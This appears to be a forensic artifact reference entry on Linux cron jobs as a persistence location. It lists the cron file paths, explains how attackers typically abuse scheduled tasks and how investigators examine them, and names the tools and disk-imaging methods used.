Cron Jobs

linuxPersistence MechanismsDisk Image

Location

/etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/<user>

Description

Scheduled task definitions across system-wide crontab, the cron.d drop-in directory, and per-user crontabs. Each entry specifies a schedule, user context, and command to execute.

Forensic Value

Cron is the most common Linux persistence mechanism. Attacker cron entries typically download and execute payloads from external URLs, restart reverse shells at intervals, or run cryptominers. Checking /var/spool/cron/crontabs/ for all users reveals per-user entries that do not appear in the system-wide crontab. File modification timestamps on cron files help establish when persistence was installed.

Tools Required

catfindls -lacrontab -laureport

Used in Procedures

Comprehensive Persistence Mechanism Sweep

eradicate

Acquisition Methods

dd / dc3dd Raw Disk Image

linux — physical

dcfldd Forensic Disk Image

linux — physical

ewfacquire E01 Disk Image

linux — physical

Guymager Full Disk Image

linux — physical

tar Logical Collection

linux — logical